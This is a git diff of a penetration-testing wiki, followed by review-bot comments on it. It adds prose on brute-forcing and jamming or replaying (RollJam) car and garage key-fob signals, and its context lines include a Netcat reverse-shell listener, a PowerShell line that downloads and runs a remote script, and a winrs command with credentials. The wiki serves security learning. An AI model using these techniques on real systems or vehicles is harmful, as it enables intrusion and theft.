diff --git a/.gitbook/assets/image (2) (6) (2).png b/.gitbook/assets/image (2) (6) (2).png new file mode 100644 index 00000000..aa2d624c Binary files /dev/null and b/.gitbook/assets/image (2) (6) (2).png differ diff --git a/.gitbook/assets/image (2) (6).png b/.gitbook/assets/image (2) (6).png index aa2d624c..5109dd9b 100644 Binary files a/.gitbook/assets/image (2) (6).png and b/.gitbook/assets/image (2) (6).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 5109dd9b..8cbefda2 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1) (4).png b/.gitbook/assets/image (3) (1) (4).png new file mode 100644 index 00000000..7ed352b6 Binary files /dev/null and b/.gitbook/assets/image (3) (1) (4).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 7ed352b6..c65f8a06 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index c65f8a06..884a59fd 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (5) (1).png b/.gitbook/assets/image (4) (5) (1).png new file mode 100644 index 00000000..efc07ea7 Binary files /dev/null and b/.gitbook/assets/image (4) (5) (1).png differ diff --git a/.gitbook/assets/image (4) (5).png b/.gitbook/assets/image (4) (5).png index efc07ea7..786ef209 100644 Binary files a/.gitbook/assets/image (4) (5).png and b/.gitbook/assets/image (4) (5).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 786ef209..1ad2a58a 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ 
diff --git a/.gitbook/assets/image (5) (4).png b/.gitbook/assets/image (5) (4).png new file mode 100644 index 00000000..63d09319 Binary files /dev/null and b/.gitbook/assets/image (5) (4).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png index 63d09319..8d941766 100644 Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 884a59fd..ae902527 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/linux-hardening/freeipa-pentesting.md b/linux-hardening/freeipa-pentesting.md index 112f604d..5cc85c10 100644 --- a/linux-hardening/freeipa-pentesting.md +++ b/linux-hardening/freeipa-pentesting.md @@ -96,7 +96,7 @@ CCACHE Tickets \*\*\*\* can also be **stored** in \*\*\*\* the Linux **keyring** Depending on how the administrator scoped the ticket stored inside of the Unix keyring, parsing it out may be difficult. However, the **default** **scope** for CCACHE Tickets in the Unix keyring is **`KEYRING:persistent:uidnumber`**. Fortunately if you are in the **context** of the **user**, `klist` can **parse** this information for us. -
+
As an attacker, **re-using a CCACHE** Ticket stored in the Unix **keyring** is fairly **difficult** depending on how the ticket is scoped. Fortunately [@Zer1t0](https://github.com/Zer1t0) from [@Tarlogic](https://twitter.com/Tarlogic) has built a tool that can extract Kerberos tickets from the Unix keyring. The tool is called **Tickey** and can be found [**here**](https://github.com/TarlogicSecurity/tickey). diff --git a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md index f1d375ae..7ace7c54 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md @@ -89,7 +89,7 @@ An exception to these rules is the **root cgroup** found at the bottom of the hi Even with no controllers enabled, you can see the CPU usage of a cgroup by looking at its cpu.stat file: -
+
Because this is the accumulated CPU usage over the entire lifespan of the cgroup, you can see how a service consumes processor time even if it spawns many subprocesses that eventually terminate. diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 5f99cb56..b7eb0f03 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -2,13 +2,13 @@
-πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe The next step is to choose `Install app from file` and upload the application. -
+
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). @@ -104,7 +104,7 @@ sudo nc -lnvp 443 listening on [any] 443 ... ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. **** As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. \*\*\*\* As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. #### Linux @@ -135,12 +135,12 @@ In the following page you can find an explanation how this service can be abused
-πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index bb5f7eaf..6feb3b3c 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -124,7 +124,7 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod ``` -
+
## RCE: preload diff --git a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md index c80b998a..493893c7 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md @@ -100,7 +100,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance: -
+
## Nginx diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index fe3e7561..12d7ebc2 100644 --- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -1,4 +1,4 @@ -# FZ - Sub-Ghz +# FZ - Sub-GHz
@@ -16,7 +16,7 @@ Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised. -
+
## Sub-GHz hardware diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md index 1246ad52..34cc20ca 100644 --- a/todo/radio-hacking/sub-ghz-rf.md +++ b/todo/radio-hacking/sub-ghz-rf.md @@ -21,9 +21,33 @@ Garage door openers typically operate at frequencies in the 300-190 MHz range, w Most car key fobs operate on either **315 MHz or 433 MHz**. These are both radio frequencies, and they are used in a variety of different applications. The main difference between the two frequencies is that 433 MHz has a longer range than 315 MHz. This means that 433 MHz is better for applications that require a longer range, such as remote keyless entry.\ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz. -## Security +## **Brute-force Attack** -### Rolling Codes +
+ +If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins: + +
+ +and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.** + +Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**: + +
+ +Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame) + +Requiring a preamble will avoid the De Bruijn Sequence optimization and rolling codes will prevent this attack. + +## Sub-GHz Attack + +To attack these signals with Flipper Zero check: + +{% content-ref url="flipper-zero/fz-sub-ghz.md" %} +[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md) +{% endcontent-ref %} + +## Rolling Codes Protection Automatic garage door openers typically use a wireless remote control to open and close the garage door. The remote control **sends a radio frequency (RF) signal** to the garage door opener, which activates the motor to open or close the door. 
@@ -33,17 +57,40 @@ The **RF signal is typically transmitted using a rolling code**, which means tha In a rolling code system, the remote control and the garage door opener have a **shared algorithm** that **generates a new code** every time the remote is used. The garage door opener will only respond to the **correct code**, making it much more difficult for someone to gain unauthorised access to the garage just by capturing a code. -## Attack +### **Missing Link Attack** -To attack these signals with Flipper Zero check: +Basically, you listen for the button and **capture the signal whilst the remote is out of range** of the device (say the car or garage). You then move to the device and **use the captured code to open it**. -{% content-ref url="flipper-zero/fz-sub-ghz.md" %} -[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md) -{% endcontent-ref %} +### Full Link Jamming Attack + +An attacker could **jam the signal near the vehicle or receive**r so the **receiver cannot actually β€˜hear’ the code**, and once that is happening you can simply **capture and replay** the code when you have stopped jamming. + +The victim at some point will use the **keys to lock the car**, but then the attack will have **recorded enough "close door" codes** that hopefully could be resent to open the door (a **change of frequency might be needed** as there are cars that use the same codes to open and close but listens for both commands in different frequencies). + +{% hint style="warning" %} +**Jamming works**, but it's noticeable as if the **person locking the car simply tests the doors** to ensure they are locked they would notice the car unlocked. Additionally if they were aware of such attacks they could even listen to the fact that the doors never made the lock **sound** or the cars **lights** never flashed when they pressed the β€˜lock’ button. +{% endhint %} + +### **Code Grabbing Attack ( aka β€˜RollJam’ )** + +This is a more **stealth Jamming technique**. 
The attacker will jam the signal, so when the victim tries to lock the door it won't work, but the attacker will **record this code**. Then, the victim will **try to lock the car again** pressing the button and the car will **record this second code**.\ +Instantly after this the **attacker can send the first code** and the **car will lock** (victim will think the second press closed it). Then, the attacker will be able to **send the second stolen code to open** the car (supposing that a **"close car" code can also be used to open it**). A change of frequency might be needed (as there are cars that use the same codes to open and close but listens for both commands in different frequencies). + +The attacker can **jam the car receiver and not his receiver** because if the car receiver is listening in for example a 1MHz broadband, the attacker won't **jam** the exact frequency used by the remote but **a close one in that spectrum** while the **attackers receiver will be listening in a smaller range** where he can listen the remote signal **without the jam signal**. + +{% hint style="warning" %} +Other implementations seen in specifications show that the **rolling code is a portion** of the total code sent. Ie the code sent is a **24 bit key** where the first **12 are the rolling code**, the **second 8 are the command** (such as lock or unlock) and the last 4 is the **checksum**. Vehicles implementing this type are also naturally susceptible as the attacker merely needs to replace the rolling code segment to be able to **use any rolling code on both frequencies**. +{% endhint %} + +### Alarm Sounding Jamming Attack + +Testing against an aftermarket rolling code system installed on a car, **sending the same code twice** immediately **activated the alarm** and immobiliser providing a unique **denial of service** opportunity. 
Ironically the means of **disabling the alarm** and immobiliser was to **press** the **remote**, providing an attacker with the ability to **continually perform DoS attack**. Or mix this attack with the **previous one to obtain more codes** as the victim would like to stop the attack asap. ## References * [https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/](https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/) +* [https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/](https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/) +* [https://samy.pl/defcon2015/](https://samy.pl/defcon2015/)
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md index a2321fcf..ad90a0d8 100644 --- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md +++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md @@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_: -
+
### OpenSSH diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md index bb2b1824..5bb851e5 100644 --- a/windows-hardening/av-bypass.md +++ b/windows-hardening/av-bypass.md @@ -169,7 +169,7 @@ It allows antivirus solutions to inspect script behavior by exposing script cont Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender. -
+
Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
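
Review bot: the `.gitbook/assets` entries at the top of the patch repoint existing file names to different blobs (`image (2) (6).png` goes from aa2d624c to 5109dd9b, `image (2).png` from 5109dd9b to 8cbefda2, `image.png` from 884a59fd to ae902527), so every page that embeds one of these names will silently show a different picture unless its reference moved in the same commit. Please confirm that each page referencing the shifted names was updated, and consider giving new screenshots descriptive, stable file names instead of letting the numbered names cascade.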
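
Review bot: in `network-services-pentesting/8089-splunkd.md` at `@@ -104,7 +104,7`, the replacement line turns the stray `****` after `Upload`. into `\*\*\*\*`, which renders as four literal asterisks in the middle of the sentence rather than removing an empty bold span. Delete the marker entirely so the text reads "click `Upload`. As **soon as we upload the application**, ...". The same escaped marker is visible twice in the context of the `freeipa-pentesting.md` hunk ("CCACHE Tickets \*\*\*\* can also be **stored** in \*\*\*\* the Linux **keyring**") and deserves the same cleanup.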
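
Review bot: the new `## **Brute-force Attack**` section in `todo/radio-hacking/sub-ghz-rf.md` (`@@ -21,9 +21,33`) gives only the reductions ("reduced to 6mins", "3minutes", "8 seconds") and never states in text the starting duration, the code length or the key space they apply to, so the section is unreadable if the embedded figures fail to load. Add one sentence with the baseline before the first figure. The first added sentence is also ungrammatical ("If instead of sending each code 5 times (...) so just send it once"), "burteforce" is a typo, and the bold heading is inconsistent with the plain `## Sub-GHz Attack` and `## Rolling Codes Protection` headings added in the same hunk. The closing line about requiring a preamble and using rolling codes is the only mitigation mentioned and would be easier to find under its own short subheading.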
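
Review bot: in the `Code Grabbing Attack` paragraph of `todo/radio-hacking/sub-ghz-rf.md` (`@@ -33,17 +57,40`), "the car will **record this second code**" contradicts the next sentence, which calls it "the second stolen code" and has the attacker replaying the first code to lock the car; the subject of that clause should be the attacker, not the car. In the same hunk, `vehicle or receive**r` closes the bold span inside the word, "the attack will have **recorded enough "close door" codes**" should read "the attacker", and the parenthetical about a change of frequency is repeated almost verbatim in two sections and could be stated once. Since the four new `###` subsections describe attacks, placing them under `## Rolling Codes Protection` is confusing; a separate heading for the attacks, followed by the conditions under which rolling codes do and do not stop them, would read more clearly for someone assessing their own system.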